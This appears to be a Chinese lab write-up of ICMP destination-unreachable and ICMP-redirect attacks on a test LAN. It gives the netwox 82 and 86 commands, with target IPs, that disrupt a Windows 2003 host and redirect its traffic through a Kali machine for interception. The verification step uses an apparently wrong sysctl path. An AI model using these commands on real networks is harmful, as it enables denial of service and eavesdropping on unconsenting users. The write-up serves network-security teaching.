一、实验拓扑 二、拓扑介绍 局域网:172.24.8.0 攻击者kali:172.24.8.129 受害者win2003:172.24.8.253 PC2:172.24.8.254 外网主机:10.1.1.100
三、实验步骤 1)首先测试设备之间的连通性(win2003为例) 2)ICMP不可达,实现win2003主机访问外网的时候都出现目标主机不可达的情况 即只需要做到win2003在访问172.24.8.2网关时出现主机不可达即可。 使用netwox 82号工具来实现(可以同时开几个终端来增强效果):
sudo netwox 82 -f "host 172.24.8.253" -i "172.24.8.2" -f:进行筛选 -i:目标地址查看效果: 可以明显看到其中间断的出现了一些目标不可达的报文,说名实验成功。
3)ICMP重定向,实现当win2003访问外网时,需要先将报文交给攻击者kali后,再由kali转发到网关,最后再到外网主机。 实现这一目标,只需将将win2003的默认网关设为攻击者kali的主机地址即可,同时需要在kali上开启路由转发功能。 ①开启路由转发功能
vim /etc/sysctl.conf //编辑sysctl.conf net.ipv4.ip_forward = 1 //设置为1 sysctl -p /etc/sysctl.conf //立即生效不需要重启 cat /etc/sys/net/ipv4/ipv4_forward //查看值是否为1,为1表示修改完成,为0表示没有修改②使用netwox的86号工具来实现
sudo netwox 86 -f "host 172.24.8.253" -g "172.24.8.129" -i "172.24.8.2" -f:路由筛选 -g:新指定的网关地址 -i:原来的网关地址在攻击者kali上面进行抓包,可以抓到ICMP重定向的包和要传输的数据包,也就是说,可以在kali上面获取从win2003发往外网的数据包。
